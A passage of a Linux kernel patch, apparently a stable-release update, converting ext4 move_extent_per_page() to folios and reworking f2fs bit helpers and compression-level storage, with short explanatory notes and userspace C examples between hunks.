+@@ -253,6 +253,7 @@ move_extent_per_page(struct file *o_filp, struct inode *donor_inode,
+ {
+ 	struct inode *orig_inode = file_inode(o_filp);
+ 	struct page *pagep[2] = {NULL, NULL};
++	struct folio *folio[2] = {NULL, NULL};
+ 	handle_t *handle;
+ 	ext4_lblk_t orig_blk_offset, donor_blk_offset;
+ 	unsigned long blocksize = orig_inode->i_sb->s_blocksize;
+@@ -313,6 +314,13 @@ again:
+ 	 * hold page's lock, if it is still the case data copy is not
+ 	 * necessary, just swap data blocks between orig and donor.
+ 	 */
++	folio[0] = page_folio(pagep[0]);
++	folio[1] = page_folio(pagep[1]);
++
++	VM_BUG_ON_FOLIO(folio_test_large(folio[0]), folio[0]);
++	VM_BUG_ON_FOLIO(folio_test_large(folio[1]), folio[1]);
++	VM_BUG_ON_FOLIO(folio_nr_pages(folio[0]) != folio_nr_pages(folio[1]), folio[1]);
++
+ 	if (unwritten) {
+ 		ext4_double_down_write_data_sem(orig_inode, donor_inode);
+ 		/* If any of extents in range became initialized we have to
+@@ -331,10 +339,8 @@ again:
+ 			ext4_double_up_write_data_sem(orig_inode, donor_inode);
+ 			goto data_copy;
+ 		}
+-		if ((page_has_private(pagep[0]) &&
+-		     !try_to_release_page(pagep[0], 0)) ||
+-		    (page_has_private(pagep[1]) &&
+-		     !try_to_release_page(pagep[1], 0))) {
++		if (!filemap_release_folio(folio[0], 0) ||
++		    !filemap_release_folio(folio[1], 0)) {
+ 			*err = -EBUSY;
+ 			goto drop_data_sem;
+ 		}
+@@ -344,19 +350,19 @@ again:
+ 						   block_len_in_page, 1, err);
+ 	drop_data_sem:
+ 		ext4_double_up_write_data_sem(orig_inode, donor_inode);
+-		goto unlock_pages;
++		goto unlock_folios;
+ 	}
+ data_copy:
+-	*err = mext_page_mkuptodate(pagep[0], from, from + replaced_size);
++	*err = mext_page_mkuptodate(&folio[0]->page, from, from + replaced_size);
+ 	if (*err)
+-		goto unlock_pages;
++		goto unlock_folios;
+ 
+ 	/* At this point all buffers in range are uptodate, old mapping layout
+ 	 * is no longer required, try to drop it now. */
+-	if ((page_has_private(pagep[0]) && !try_to_release_page(pagep[0], 0)) ||
+-	    (page_has_private(pagep[1]) && !try_to_release_page(pagep[1], 0))) {
++	if (!filemap_release_folio(folio[0], 0) ||
++	    !filemap_release_folio(folio[1], 0)) {
+ 		*err = -EBUSY;
+-		goto unlock_pages;
++		goto unlock_folios;
+ 	}
+ 	ext4_double_down_write_data_sem(orig_inode, donor_inode);
+ 	replaced_count = ext4_swap_extents(handle, orig_inode, donor_inode,
+@@ -369,13 +375,13 @@ data_copy:
+ 			replaced_size =
+ 				block_len_in_page << orig_inode->i_blkbits;
+ 		} else
+-			goto unlock_pages;
++			goto unlock_folios;
+ 	}
+ 	/* Perform all necessary steps similar write_begin()/write_end()
+ 	 * but keeping in mind that i_size will not change */
+-	if (!page_has_buffers(pagep[0]))
+-		create_empty_buffers(pagep[0], 1 << orig_inode->i_blkbits, 0);
+-	bh = page_buffers(pagep[0]);
++	if (!folio_buffers(folio[0]))
++		create_empty_buffers(&folio[0]->page, 1 << orig_inode->i_blkbits, 0);
++	bh = folio_buffers(folio[0]);
+ 	for (i = 0; i < data_offset_in_page; i++)
+ 		bh = bh->b_this_page;
+ 	for (i = 0; i < block_len_in_page; i++) {
+@@ -385,7 +391,7 @@ data_copy:
+ 		bh = bh->b_this_page;
+ 	}
+ 	if (!*err)
+-		*err = block_commit_write(pagep[0], from, from + replaced_size);
++		*err = block_commit_write(&folio[0]->page, from, from + replaced_size);
+ 
+ 	if (unlikely(*err < 0))
+ 		goto repair_branches;
+@@ -395,11 +401,11 @@ data_copy:
+ 	*err = ext4_jbd2_inode_add_write(handle, orig_inode,
+ 			(loff_t)orig_page_offset << PAGE_SHIFT, replaced_size);
+ 
+-unlock_pages:
+-	unlock_page(pagep[0]);
+-	put_page(pagep[0]);
+-	unlock_page(pagep[1]);
+-	put_page(pagep[1]);
++unlock_folios:
++	folio_unlock(folio[0]);
++	folio_put(folio[0]);
++	folio_unlock(folio[1]);
++	folio_put(folio[1]);
+ stop_journal:
+ 	ext4_journal_stop(handle);
+ 	if (*err == -ENOSPC &&
+@@ -430,7 +436,7 @@ repair_branches:
+ 		*err = -EIO;
+ 	}
+ 	replaced_count = 0;
+-	goto unlock_pages;
++	goto unlock_folios;
+ }
+ 
+ /**
+diff --git a/fs/f2fs/checkpoint.c b/fs/f2fs/checkpoint.c
+index 5df04ed010cae..eb4d69f53337f 100644
+--- a/fs/f2fs/checkpoint.c
++++ b/fs/f2fs/checkpoint.c
+@@ -984,7 +984,7 @@ int f2fs_get_valid_checkpoint(struct f2fs_sb_info *sbi)
+ 
+ 	cp_blk_no = le32_to_cpu(fsb->cp_blkaddr);
+ 	if (cur_page == cp2)
+-		cp_blk_no += 1 << le32_to_cpu(fsb->log_blocks_per_seg);
++		cp_blk_no += BIT(le32_to_cpu(fsb->log_blocks_per_seg));
+ 
+ 	for (i = 1; i < cp_blks; i++) {
+ 		void *sit_bitmap_ptr;
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index 11d9dce994dbe..4cb58e8d699e2 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -241,7 +241,7 @@ static int lz4_init_compress_ctx(struct compress_ctx *cc)
+ 	unsigned int size = LZ4_MEM_COMPRESS;
+ 
+ #ifdef CONFIG_F2FS_FS_LZ4HC
+-	if (F2FS_I(cc->inode)->i_compress_flag >> COMPRESS_LEVEL_OFFSET)
++	if (F2FS_I(cc->inode)->i_compress_level)
+ 		size = LZ4HC_MEM_COMPRESS;
+ #endif
+ 
+@@ -267,8 +267,7 @@ static void lz4_destroy_compress_ctx(struct compress_ctx *cc)
+ #ifdef CONFIG_F2FS_FS_LZ4HC
+ static int lz4hc_compress_pages(struct compress_ctx *cc)
+ {
+-	unsigned char level = F2FS_I(cc->inode)->i_compress_flag >>
+-						COMPRESS_LEVEL_OFFSET;
++	unsigned char level = F2FS_I(cc->inode)->i_compress_level;
+ 	int len;
+ 
+ 	if (level)
+@@ -332,17 +331,15 @@ static const struct f2fs_compress_ops f2fs_lz4_ops = {
+ #endif
+ 
+ #ifdef CONFIG_F2FS_FS_ZSTD
+-#define F2FS_ZSTD_DEFAULT_CLEVEL	1
+-
+ static int zstd_init_compress_ctx(struct compress_ctx *cc)
+ {
+ 	zstd_parameters params;
+ 	zstd_cstream *stream;
+ 	void *workspace;
+ 	unsigned int workspace_size;
+-	unsigned char level = F2FS_I(cc->inode)->i_compress_flag >>
+-						COMPRESS_LEVEL_OFFSET;
++	unsigned char level = F2FS_I(cc->inode)->i_compress_level;
+ 
++	/* Need to remain this for backward compatibility */
+ 	if (!level)
+ 		level = F2FS_ZSTD_DEFAULT_CLEVEL;
+ 
+@@ -675,7 +672,7 @@ static int f2fs_compress_pages(struct compress_ctx *cc)
+ 
+ 	cc->cbuf->clen = cpu_to_le32(cc->clen);
+ 
+-	if (fi->i_compress_flag & 1 << COMPRESS_CHKSUM)
++	if (fi->i_compress_flag & BIT(COMPRESS_CHKSUM))
+ 		chksum = f2fs_crc32(F2FS_I_SB(cc->inode),
+ 					cc->cbuf->cdata, cc->clen);
+ 	cc->cbuf->chksum = cpu_to_le32(chksum);
+@@ -773,7 +770,7 @@ void f2fs_decompress_cluster(struct decompress_io_ctx *dic, bool in_task)
+ 
+ 	ret = cops->decompress_pages(dic);
+ 
+-	if (!ret && (fi->i_compress_flag & 1 << COMPRESS_CHKSUM)) {
++	if (!ret && (fi->i_compress_flag & BIT(COMPRESS_CHKSUM))) {
+ 		u32 provided = le32_to_cpu(dic->cbuf->chksum);
+ 		u32 calculated = f2fs_crc32(sbi, dic->cbuf->cdata, dic->clen);
+ 
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index ea05710ca9bdf..3666c1fd77a64 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -95,17 +95,17 @@ static enum count_type __read_io_type(struct page *page)
+ /* postprocessing steps for read bios */
+ enum bio_post_read_step {
+ #ifdef CONFIG_FS_ENCRYPTION
+-	STEP_DECRYPT	= 1 << 0,
++	STEP_DECRYPT	= BIT(0),
+ #else
+ 	STEP_DECRYPT	= 0,	/* compile out the decryption-related code */
+ #endif
+ #ifdef CONFIG_F2FS_FS_COMPRESSION
+-	STEP_DECOMPRESS	= 1 << 1,
++	STEP_DECOMPRESS	= BIT(1),
+ #else
+ 	STEP_DECOMPRESS	= 0,	/* compile out the decompression-related code */
+ #endif
+ #ifdef CONFIG_FS_VERITY
+-	STEP_VERITY	= 1 << 2,
++	STEP_VERITY	= BIT(2),
+ #else
+ 	STEP_VERITY	= 0,	/* compile out the verity-related code */
+ #endif
+@@ -409,7 +409,7 @@ int f2fs_target_device_index(struct f2fs_sb_info *sbi, block_t blkaddr)
+ 
+ static blk_opf_t f2fs_io_flags(struct f2fs_io_info *fio)
+ {
+-	unsigned int temp_mask = (1 << NR_TEMP_TYPE) - 1;
++	unsigned int temp_mask = GENMASK(NR_TEMP_TYPE - 1, 0);
+ 	unsigned int fua_flag, meta_flag, io_flag;
+ 	blk_opf_t op_flags = 0;
+ 
+@@ -431,9 +431,9 @@ static blk_opf_t f2fs_io_flags(struct f2fs_io_info *fio)
+ 	 *    5 |    4 |   3 |    2 |    1 |   0 |
+ 	 * Cold | Warm | Hot | Cold | Warm | Hot |
+ 	 */
+-	if ((1 << fio->temp) & meta_flag)
++	if (BIT(fio->temp) & meta_flag)
+ 		op_flags |= REQ_META;
+-	if ((1 << fio->temp) & fua_flag)
++	if (BIT(fio->temp) & fua_flag)
+ 		op_flags |= REQ_FUA;
+ 	return op_flags;
+ }
+diff --git a/fs/f2fs/dir.c b/fs/f2fs/dir.c
+index 8373eba3a1337..510736d2ae110 100644
+--- a/fs/f2fs/dir.c
++++ b/fs/f2fs/dir.c
+@@ -29,7 +29,7 @@ static unsigned long dir_blocks(struct inode *inode)
+ static unsigned int dir_buckets(unsigned int level, int dir_level)
+ {
+ 	if (level + dir_level < MAX_DIR_HASH_DEPTH / 2)
+-		return 1 << (level + dir_level);
++		return BIT(level + dir_level);
+ 	else
+ 		return MAX_DIR_BUCKETS;
+ }
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index f56abb39601ac..5c76ba764b71f 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -64,7 +64,7 @@ enum {
+ };
+ 
+ #ifdef CONFIG_F2FS_FAULT_INJECTION
+-#define F2FS_ALL_FAULT_TYPE		((1 << FAULT_MAX) - 1)
++#define F2FS_ALL_FAULT_TYPE		(GENMASK(FAULT_MAX - 1, 0))
+ 
+ struct f2fs_fault_info {
+ 	atomic_t inject_ops;
+@@ -73,7 +73,7 @@ struct f2fs_fault_info {
+ };
+ 
+ extern const char *f2fs_fault_name[FAULT_MAX];
+-#define IS_FAULT_SET(fi, type) ((fi)->inject_type & (1 << (type)))
++#define IS_FAULT_SET(fi, type) ((fi)->inject_type & BIT(type))
+ #endif
+ 
+ /*
+@@ -840,7 +840,7 @@ struct f2fs_inode_info {
+ 	unsigned char i_compress_algorithm;	/* algorithm type */
+ 	unsigned char i_log_cluster_size;	/* log of cluster size */
+ 	unsigned char i_compress_level;		/* compress level (lz4hc,zstd) */
+-	unsigned short i_compress_flag;		/* compress flag */
++	unsigned char i_compress_flag;		/* compress flag */
+ 	unsigned int i_cluster_size;		/* cluster size */
+ 
+ 	unsigned int atomic_write_cnt;
+@@ -1412,7 +1412,7 @@ static inline void set_page_private_##name(struct page *page) \
+ static inline void clear_page_private_##name(struct page *page) \
+ { \
+ 	clear_bit(PAGE_PRIVATE_##flagname, &page_private(page)); \
+-	if (page_private(page) == 1 << PAGE_PRIVATE_NOT_POINTER) { \
++	if (page_private(page) == BIT(PAGE_PRIVATE_NOT_POINTER)) { \
+ 		set_page_private(page, 0); \
+ 		if (PagePrivate(page)) { \
+ 			ClearPagePrivate(page); \
+@@ -1462,8 +1462,8 @@ static inline void set_page_private_data(struct page *page, unsigned long data)
+ 
+ static inline void clear_page_private_data(struct page *page)
+ {
+-	page_private(page) &= (1 << PAGE_PRIVATE_MAX) - 1;
+-	if (page_private(page) == 1 << PAGE_PRIVATE_NOT_POINTER) {
++	page_private(page) &= GENMASK(PAGE_PRIVATE_MAX - 1, 0);
++	if (page_private(page) == BIT(PAGE_PRIVATE_NOT_POINTER)) {
+ 		set_page_private(page, 0);
+ 		if (PagePrivate(page)) {
+ 			ClearPagePrivate(page);
+@@ -1501,6 +1501,8 @@ struct compress_data {
+ 
+ #define F2FS_COMPRESSED_PAGE_MAGIC	0xF5F2C000
+ 
++#define F2FS_ZSTD_DEFAULT_CLEVEL	1
++
+ #define	COMPRESS_LEVEL_OFFSET	8
+ 
+ /* compress context */
+@@ -2882,7 +2884,7 @@ static inline int f2fs_test_bit(unsigned int nr, char *addr)
+ 	int mask;
+ 
+ 	addr += (nr >> 3);
+-	mask = 1 << (7 - (nr & 0x07));
++	mask = BIT(7 - (nr & 0x07));
+ 	return mask & *addr;
+ }
+ 
+@@ -2891,7 +2893,7 @@ static inline void f2fs_set_bit(unsigned int nr, char *addr)
+ 	int mask;
+ 
+ 	addr += (nr >> 3);
+-	mask = 1 << (7 - (nr & 0x07));
++	mask = BIT(7 - (nr & 0x07));
+ 	*addr |= mask;
+ }
+ 
+@@ -2900,7 +2902,7 @@ static inline void f2fs_clear_bit(unsigned int nr, char *addr)
+ 	int mask;
+ 
+ 	addr += (nr >> 3);
+-	mask = 1 << (7 - (nr & 0x07));
++	mask = BIT(7 - (nr & 0x07));
+ 	*addr &= ~mask;
+ }
+ 
+@@ -2910,7 +2912,7 @@ static inline int f2fs_test_and_set_bit(unsigned int nr, char *addr)
+ 	int ret;
+ 
+ 	addr += (nr >> 3);
+-	mask = 1 << (7 - (nr & 0x07));
++	mask = BIT(7 - (nr & 0x07));
+ 	ret = mask & *addr;
+ 	*addr |= mask;
+ 	return ret;
+@@ -2922,7 +2924,7 @@ static inline int f2fs_test_and_clear_bit(unsigned int nr, char *addr)
+ 	int ret;
+ 
+ 	addr += (nr >> 3);
+-	mask = 1 << (7 - (nr & 0x07));
++	mask = BIT(7 - (nr & 0x07));
+ 	ret = mask & *addr;
+ 	*addr &= ~mask;
+ 	return ret;
+@@ -2933,7 +2935,7 @@ static inline void f2fs_change_bit(unsigned int nr, char *addr)
+ 	int mask;
+ 
+ 	addr += (nr >> 3);
+-	mask = 1 << (7 - (nr & 0x07));
++	mask = BIT(7 - (nr & 0x07));
+ 	*addr ^= mask;
+ }
+ 
+@@ -4333,15 +4335,14 @@ static inline int set_compress_context(struct inode *inode)
+ 			F2FS_OPTION(sbi).compress_log_size;
+ 	F2FS_I(inode)->i_compress_flag =
+ 			F2FS_OPTION(sbi).compress_chksum ?
+-				1 << COMPRESS_CHKSUM : 0;
++				BIT(COMPRESS_CHKSUM) : 0;
+ 	F2FS_I(inode)->i_cluster_size =
+-			1 << F2FS_I(inode)->i_log_cluster_size;
++			BIT(F2FS_I(inode)->i_log_cluster_size);
+ 	if ((F2FS_I(inode)->i_compress_algorithm == COMPRESS_LZ4 ||
+ 		F2FS_I(inode)->i_compress_algorithm == COMPRESS_ZSTD) &&
+ 			F2FS_OPTION(sbi).compress_level)
+-		F2FS_I(inode)->i_compress_flag |=
+-				F2FS_OPTION(sbi).compress_level <<
+-				COMPRESS_LEVEL_OFFSET;
++		F2FS_I(inode)->i_compress_level =
++				F2FS_OPTION(sbi).compress_level;
+ 	F2FS_I(inode)->i_flags |= F2FS_COMPR_FL;
+ 	set_inode_flag(inode, FI_COMPRESSED_FILE);
+ 	stat_inc_compr_inode(inode);
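
Most of the f2fs churn in this release is mechanical: open-coded "1 << n" becomes BIT(n) and hand-built masks become GENMASK(h, l), both from <linux/bits.h>. For reference, BIT(n) is (1UL << (n)) and GENMASK(h, l) sets the contiguous bits l..h; a standalone illustration (the GENMASK copy below assumes a 64-bit unsigned long):

  #include <stdio.h>

  /* Userspace copies of the helpers the hunks switch to; the kernel's
   * GENMASK uses BITS_PER_LONG - 1 where 63 is hard-coded here. */
  #define BIT(n)          (1UL << (n))
  #define GENMASK(h, l)   (((~0UL) << (l)) & (~0UL >> (63 - (h))))

  int main(void)
  {
          printf("BIT(4)       = %#lx\n", BIT(4));         /* 0x10 */
          printf("GENMASK(7,0) = %#lx\n", GENMASK(7, 0));  /* 0xff */
          printf("GENMASK(7,4) = %#lx\n", GENMASK(7, 4));  /* 0xf0 */
          return 0;
  }
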
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index d0c17366ebf48..9b9fb3c57ec6c 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -3983,7 +3983,16 @@ static int f2fs_ioc_set_compress_option(struct file *filp, unsigned long arg)
+ 
+ 	F2FS_I(inode)->i_compress_algorithm = option.algorithm;
+ 	F2FS_I(inode)->i_log_cluster_size = option.log_cluster_size;
+-	F2FS_I(inode)->i_cluster_size = 1 << option.log_cluster_size;
++	F2FS_I(inode)->i_cluster_size = BIT(option.log_cluster_size);
++	/* Set default level */
++	if (F2FS_I(inode)->i_compress_algorithm == COMPRESS_ZSTD)
++		F2FS_I(inode)->i_compress_level = F2FS_ZSTD_DEFAULT_CLEVEL;
++	else
++		F2FS_I(inode)->i_compress_level = 0;
++	/* Adjust mount option level */
++	if (option.algorithm == F2FS_OPTION(sbi).compress_algorithm &&
++	    F2FS_OPTION(sbi).compress_level)
++		F2FS_I(inode)->i_compress_level = F2FS_OPTION(sbi).compress_level;
+ 	f2fs_mark_inode_dirty_sync(inode, true);
+ 
+ 	if (!f2fs_is_compress_backend_ready(inode))
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index 1fc7760499f10..0010579f17368 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -450,12 +450,18 @@ static int do_read_inode(struct inode *inode)
+ 					(fi->i_flags & F2FS_COMPR_FL)) {
+ 		if (F2FS_FITS_IN_INODE(ri, fi->i_extra_isize,
+ 					i_log_cluster_size)) {
++			unsigned short compress_flag;
++
+ 			atomic_set(&fi->i_compr_blocks,
+ 					le64_to_cpu(ri->i_compr_blocks));
+ 			fi->i_compress_algorithm = ri->i_compress_algorithm;
+ 			fi->i_log_cluster_size = ri->i_log_cluster_size;
+-			fi->i_compress_flag = le16_to_cpu(ri->i_compress_flag);
+-			fi->i_cluster_size = 1 << fi->i_log_cluster_size;
++			compress_flag = le16_to_cpu(ri->i_compress_flag);
++			fi->i_compress_level = compress_flag >>
++						COMPRESS_LEVEL_OFFSET;
++			fi->i_compress_flag = compress_flag &
++					GENMASK(COMPRESS_LEVEL_OFFSET - 1, 0);
++			fi->i_cluster_size = BIT(fi->i_log_cluster_size);
+ 			set_inode_flag(inode, FI_COMPRESSED_FILE);
+ 		}
+ 	}
+@@ -675,13 +681,17 @@ void f2fs_update_inode(struct inode *inode, struct page *node_page)
+ 		if (f2fs_sb_has_compression(F2FS_I_SB(inode)) &&
+ 			F2FS_FITS_IN_INODE(ri, F2FS_I(inode)->i_extra_isize,
+ 							i_log_cluster_size)) {
++			unsigned short compress_flag;
++
+ 			ri->i_compr_blocks =
+ 				cpu_to_le64(atomic_read(
+ 					&F2FS_I(inode)->i_compr_blocks));
+ 			ri->i_compress_algorithm =
+ 				F2FS_I(inode)->i_compress_algorithm;
+-			ri->i_compress_flag =
+-				cpu_to_le16(F2FS_I(inode)->i_compress_flag);
++			compress_flag = F2FS_I(inode)->i_compress_flag |
++				F2FS_I(inode)->i_compress_level <<
++						COMPRESS_LEVEL_OFFSET;
++			ri->i_compress_flag = cpu_to_le16(compress_flag);
+ 			ri->i_log_cluster_size =
+ 				F2FS_I(inode)->i_log_cluster_size;
+ 		}
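
On disk the compression level still shares the 16-bit i_compress_flag word with the flag bits, level in the high byte (COMPRESS_LEVEL_OFFSET is 8); in memory the two now live in separate fields, so do_read_inode() splits the word and f2fs_update_inode() re-packs it. A worked round-trip, with the flag value chosen for illustration:

  #include <stdint.h>
  #include <stdio.h>

  #define COMPRESS_LEVEL_OFFSET 8         /* as in fs/f2fs/f2fs.h */

  int main(void)
  {
          /* On-disk word: level 3 in the high byte, one flag bit low. */
          uint16_t ondisk = (3 << COMPRESS_LEVEL_OFFSET) | 0x01;

          /* The do_read_inode() split from the hunk above. */
          uint8_t level = ondisk >> COMPRESS_LEVEL_OFFSET;
          uint8_t flags = ondisk & ((1u << COMPRESS_LEVEL_OFFSET) - 1);

          /* The f2fs_update_inode() re-pack. */
          uint16_t repacked = flags |
                  (uint16_t)(level << COMPRESS_LEVEL_OFFSET);

          printf("level=%u flags=%#x repacked=%#x (round-trips: %s)\n",
                 (unsigned)level, (unsigned)flags, (unsigned)repacked,
                 repacked == ondisk ? "yes" : "no");
          return 0;
  }
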
+diff --git a/fs/f2fs/node.h b/fs/f2fs/node.h
+index 0aa48704c77a0..7068f3ac036a5 100644
+--- a/fs/f2fs/node.h
++++ b/fs/f2fs/node.h
+@@ -93,17 +93,15 @@ static inline void copy_node_info(struct node_info *dst,
+ static inline void set_nat_flag(struct nat_entry *ne,
+ 				unsigned int type, bool set)
+ {
+-	unsigned char mask = 0x01 << type;
+ 	if (set)
+-		ne->ni.flag |= mask;
++		ne->ni.flag |= BIT(type);
+ 	else
+-		ne->ni.flag &= ~mask;
++		ne->ni.flag &= ~BIT(type);
+ }
+ 
+ static inline bool get_nat_flag(struct nat_entry *ne, unsigned int type)
+ {
+-	unsigned char mask = 0x01 << type;
+-	return ne->ni.flag & mask;
++	return ne->ni.flag & BIT(type);
+ }
+ 
+ static inline void nat_reset_flag(struct nat_entry *ne)
+@@ -224,7 +222,7 @@ static inline pgoff_t next_nat_addr(struct f2fs_sb_info *sbi,
+ 	struct f2fs_nm_info *nm_i = NM_I(sbi);
+ 
+ 	block_addr -= nm_i->nat_blkaddr;
+-	block_addr ^= 1 << sbi->log_blocks_per_seg;
++	block_addr ^= BIT(sbi->log_blocks_per_seg);
+ 	return block_addr + nm_i->nat_blkaddr;
+ }
+ 
+@@ -394,7 +392,7 @@ static inline nid_t get_nid(struct page *p, int off, bool i)
+ static inline int is_node(struct page *page, int type)
+ {
+ 	struct f2fs_node *rn = F2FS_NODE(page);
+-	return le32_to_cpu(rn->footer.flag) & (1 << type);
++	return le32_to_cpu(rn->footer.flag) & BIT(type);
+ }
+ 
+ #define is_cold_node(page)	is_node(page, COLD_BIT_SHIFT)
+@@ -407,9 +405,9 @@ static inline void set_cold_node(struct page *page, bool is_dir)
+ 	unsigned int flag = le32_to_cpu(rn->footer.flag);
+ 
+ 	if (is_dir)
+-		flag &= ~(0x1 << COLD_BIT_SHIFT);
++		flag &= ~BIT(COLD_BIT_SHIFT);
+ 	else
+-		flag |= (0x1 << COLD_BIT_SHIFT);
++		flag |= BIT(COLD_BIT_SHIFT);
+ 	rn->footer.flag = cpu_to_le32(flag);
+ }
+ 
+@@ -418,9 +416,9 @@ static inline void set_mark(struct page *page, int mark, int type)
+ 	struct f2fs_node *rn = F2FS_NODE(page);
+ 	unsigned int flag = le32_to_cpu(rn->footer.flag);
+ 	if (mark)
+-		flag |= (0x1 << type);
++		flag |= BIT(type);
+ 	else
+-		flag &= ~(0x1 << type);
++		flag &= ~BIT(type);
+ 	rn->footer.flag = cpu_to_le32(flag);
+ 
+ #ifdef CONFIG_F2FS_CHECK_FS
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 1ba85ef97cbd3..3805162dcef2b 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -613,14 +613,12 @@ static int f2fs_set_lz4hc_level(struct f2fs_sb_info *sbi, const char *str)
+ {
+ #ifdef CONFIG_F2FS_FS_LZ4HC
+ 	unsigned int level;
+-#endif
+ 
+ 	if (strlen(str) == 3) {
+ 		F2FS_OPTION(sbi).compress_level = 0;
+ 		return 0;
+ 	}
+ 
+-#ifdef CONFIG_F2FS_FS_LZ4HC
+ 	str += 3;
+ 
+ 	if (str[0] != ':') {
+@@ -638,6 +636,10 @@ static int f2fs_set_lz4hc_level(struct f2fs_sb_info *sbi, const char *str)
+ 	F2FS_OPTION(sbi).compress_level = level;
+ 	return 0;
+ #else
++	if (strlen(str) == 3) {
++		F2FS_OPTION(sbi).compress_level = 0;
++		return 0;
++	}
+ 	f2fs_info(sbi, "kernel doesn't support lz4hc compression");
+ 	return -EINVAL;
+ #endif
+@@ -651,7 +653,7 @@ static int f2fs_set_zstd_level(struct f2fs_sb_info *sbi, const char *str)
+ 	int len = 4;
+ 
+ 	if (strlen(str) == len) {
+-		F2FS_OPTION(sbi).compress_level = 0;
++		F2FS_OPTION(sbi).compress_level = F2FS_ZSTD_DEFAULT_CLEVEL;
+ 		return 0;
+ 	}
+ 
+@@ -664,7 +666,7 @@ static int f2fs_set_zstd_level(struct f2fs_sb_info *sbi, const char *str)
+ 	if (kstrtouint(str + 1, 10, &level))
+ 		return -EINVAL;
+ 
+-	if (!level || level > zstd_max_clevel()) {
++	if (level < zstd_min_clevel() || level > zstd_max_clevel()) {
+ 		f2fs_info(sbi, "invalid zstd compress level: %d", level);
+ 		return -EINVAL;
+ 	}
+@@ -898,8 +900,8 @@ static int parse_options(struct super_block *sb, char *options, bool is_remount)
+ 			if (args->from && match_int(args, &arg))
+ 				return -EINVAL;
+ 			if (arg <= 0 || arg > __ilog2_u32(BIO_MAX_VECS)) {
+-				f2fs_warn(sbi, "Not support %d, larger than %d",
+-					  1 << arg, BIO_MAX_VECS);
++				f2fs_warn(sbi, "Not support %ld, larger than %d",
++					BIT(arg), BIO_MAX_VECS);
+ 				return -EINVAL;
+ 			}
+ 			F2FS_OPTION(sbi).write_io_size_bits = arg;
+@@ -1340,7 +1342,7 @@ default_check:
+ #endif
+ 
+ 	if (F2FS_IO_SIZE_BITS(sbi) && !f2fs_lfs_mode(sbi)) {
+-		f2fs_err(sbi, "Should set mode=lfs with %uKB-sized IO",
++		f2fs_err(sbi, "Should set mode=lfs with %luKB-sized IO",
+ 			 F2FS_IO_SIZE_KB(sbi));
+ 		return -EINVAL;
+ 	}
+@@ -3356,7 +3358,7 @@ static int sanity_check_raw_super(struct f2fs_sb_info *sbi,
+ 	total_sections = le32_to_cpu(raw_super->section_count);
+ 
+ 	/* blocks_per_seg should be 512, given the above check */
+-	blocks_per_seg = 1 << le32_to_cpu(raw_super->log_blocks_per_seg);
++	blocks_per_seg = BIT(le32_to_cpu(raw_super->log_blocks_per_seg));
+ 
+ 	if (segment_count > F2FS_MAX_SEGMENT ||
+ 				segment_count < F2FS_MIN_SEGMENTS) {
+@@ -3625,9 +3627,9 @@ static void init_sb_info(struct f2fs_sb_info *sbi)
+ 	sbi->log_sectors_per_block =
+ 		le32_to_cpu(raw_super->log_sectors_per_block);
+ 	sbi->log_blocksize = le32_to_cpu(raw_super->log_blocksize);
+-	sbi->blocksize = 1 << sbi->log_blocksize;
++	sbi->blocksize = BIT(sbi->log_blocksize);
+ 	sbi->log_blocks_per_seg = le32_to_cpu(raw_super->log_blocks_per_seg);
+-	sbi->blocks_per_seg = 1 << sbi->log_blocks_per_seg;
++	sbi->blocks_per_seg = BIT(sbi->log_blocks_per_seg);
+ 	sbi->segs_per_sec = le32_to_cpu(raw_super->segs_per_sec);
+ 	sbi->secs_per_zone = le32_to_cpu(raw_super->secs_per_zone);
+ 	sbi->total_sections = le32_to_cpu(raw_super->section_count);
+@@ -3883,7 +3885,7 @@ void f2fs_handle_stop(struct f2fs_sb_info *sbi, unsigned char reason)
+ 
+ 	f2fs_down_write(&sbi->sb_lock);
+ 
+-	if (raw_super->s_stop_reason[reason] < ((1 << BITS_PER_BYTE) - 1))
++	if (raw_super->s_stop_reason[reason] < GENMASK(BITS_PER_BYTE - 1, 0))
+ 		raw_super->s_stop_reason[reason]++;
+ 
+ 	err = f2fs_commit_super(sbi, false);
+@@ -4033,7 +4035,7 @@ static int f2fs_scan_devices(struct f2fs_sb_info *sbi)
+ 			  FDEV(i).start_blk, FDEV(i).end_blk);
+ 	}
+ 	f2fs_info(sbi,
+-		  "IO Block Size: %8d KB", F2FS_IO_SIZE_KB(sbi));
++		  "IO Block Size: %8ld KB", F2FS_IO_SIZE_KB(sbi));
+ 	return 0;
+ }
+ 
+diff --git a/fs/f2fs/sysfs.c b/fs/f2fs/sysfs.c
+index 3d68bfa75cf2a..751a108e612ff 100644
+--- a/fs/f2fs/sysfs.c
++++ b/fs/f2fs/sysfs.c
+@@ -451,7 +451,7 @@ out:
+ 	if (ret < 0)
+ 		return ret;
+ #ifdef CONFIG_F2FS_FAULT_INJECTION
+-	if (a->struct_type == FAULT_INFO_TYPE && t >= (1 << FAULT_MAX))
++	if (a->struct_type == FAULT_INFO_TYPE && t >= BIT(FAULT_MAX))
+ 		return -EINVAL;
+ 	if (a->struct_type == FAULT_INFO_RATE && t >= UINT_MAX)
+ 		return -EINVAL;
+diff --git a/fs/inode.c b/fs/inode.c
+index 73ad1b0d47758..8cfda7a6d5900 100644
+--- a/fs/inode.c
++++ b/fs/inode.c
+@@ -215,6 +215,8 @@ int inode_init_always(struct super_block *sb, struct inode *inode)
+ 	lockdep_set_class_and_name(&mapping->invalidate_lock,
+ 				   &sb->s_type->invalidate_lock_key,
+ 				   "mapping.invalidate_lock");
++	if (sb->s_iflags & SB_I_STABLE_WRITES)
++		mapping_set_stable_writes(mapping);
+ 	inode->i_private = NULL;
+ 	inode->i_mapping = mapping;
+ 	INIT_HLIST_HEAD(&inode->i_dentry);	/* buggered by rcu freeing */
+diff --git a/fs/nfs/fscache.c b/fs/nfs/fscache.c
